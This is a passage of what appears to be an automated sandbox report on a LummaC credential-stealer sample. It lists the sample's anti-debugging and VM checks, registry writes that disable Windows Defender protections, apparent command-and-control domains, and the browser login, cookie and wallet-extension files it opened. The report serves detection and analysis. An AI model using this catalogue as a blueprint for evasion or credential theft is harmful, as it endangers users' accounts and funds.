Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Special instruction interceptor: First address: CA1ED0 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Memory allocated: 5510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Memory allocated: 5750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Memory allocated: 56A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Code function: 3_2_00BEEE97 rdtsc

3_2_00BEEE97

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 4028	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe TID: 904	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: file.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005778000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2300704016.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303555937.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000002.2303455559.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2134567663.0000000005778000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2134567663.0000000005773000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Thread information set: HideFromDebugger			Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BECB6B Start: 00BECBAD End: 00BECB94	3_2_00BECB6B
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEEDF7 Start: 00BEEE64 End: 00BEEE69	3_2_00BEEDF7
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEEDDE Start: 00BEEE64 End: 00BEEE69	3_2_00BEEDDE

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Code function: 3_2_00BEEE97 rdtsc

3_2_00BEEE97

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Code function: 3_2_00A6B972 LdrInitializeThunk,

3_2_00A6B972

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.2304115964.0000000000D31000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: presticitpo.store

Source: file.exe, 00000000.00000002.2305090981.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe, 00000003.00000002.2458029623.0000000000C3A000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: rProgram Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1	Jump to behavior

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Registry value created: TamperProtection 0

Jump to behavior

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations	Jump to behavior

Source: file.exe, file.exe, 00000000.00000003.2186240547.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301166696.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2193032663.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2304049792.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
